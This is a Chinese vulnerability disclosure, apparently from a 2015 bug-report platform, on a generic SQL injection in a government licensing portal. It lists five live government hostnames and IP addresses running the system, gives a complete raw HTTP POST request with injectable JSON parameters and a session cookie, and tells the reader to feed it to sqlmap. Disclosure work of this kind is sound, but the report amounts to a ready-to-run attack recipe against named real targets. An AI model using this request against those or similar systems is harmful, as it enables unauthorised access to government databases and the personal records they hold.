### 简要描述:
rt
### 详细说明:
某政府在用系统通用型SQL注入#3。
案例如下:
http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp
http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp
http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp
http://120.203.196.20/outportal/licenseManage/licenseManage.jsp
### 漏洞证明:
需要一个一个的抓包。
http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
POST参数:
POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
x-requested-with: XMLHttpRequest
Content-Type: application/json
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: wssp.jiangxi.gov.cn:8008
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6
{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}}
用sqlmap -r 去跑。
[<img src="https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png" alt="021553305104c61cce41f73df23babce9ee628b4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png)
[<img src="https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png" alt="0215534880d275746dc39d36faf798203acc1f4b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png)
暂无评论